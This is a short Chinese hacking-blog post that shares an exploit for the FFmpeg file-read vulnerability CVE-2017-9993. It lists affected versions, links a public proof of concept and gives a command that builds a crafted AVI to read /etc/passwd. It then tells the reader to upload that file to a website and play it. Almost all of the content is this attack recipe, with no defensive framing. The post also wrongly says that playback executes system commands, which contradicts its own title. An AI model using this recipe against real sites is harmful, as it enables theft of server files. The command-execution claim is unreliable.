记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

FFmpeg文件读取漏洞(CVE-2017-9993)

2017-11-18 23:20

影响范围

3.2.2 3.2.5 3.1.2 2.6.8

 

poc:https://github.com/neex/ffmpeg-avi-m3u-xbin

 

python gen_xbin_avi.py file:///etc/passwd passwd.avi

 

FFmpeg文件读取漏洞(CVE-2017-9993)-Web安全

这时候会在目录下生成一个文件,上传该文件到网站上面

 

FFmpeg文件读取漏洞(CVE-2017-9993)-Web安全

 

点击播放就可以直接执行系统命令

FFmpeg文件读取漏洞(CVE-2017-9993)-Web安全


知识来源: www.0-sec.org/2017/10/29/ffmpeg%e6%96%87%e4%bb%b6%e8%af%bb%e5%8f%96%e6%bc%8f%e6%b4%9e%ef%bc%88cve-2017-9993%ef%bc%89/

阅读:203839 | 评论:0 | 标签:Exp分享 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“FFmpeg文件读取漏洞(CVE-2017-9993)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云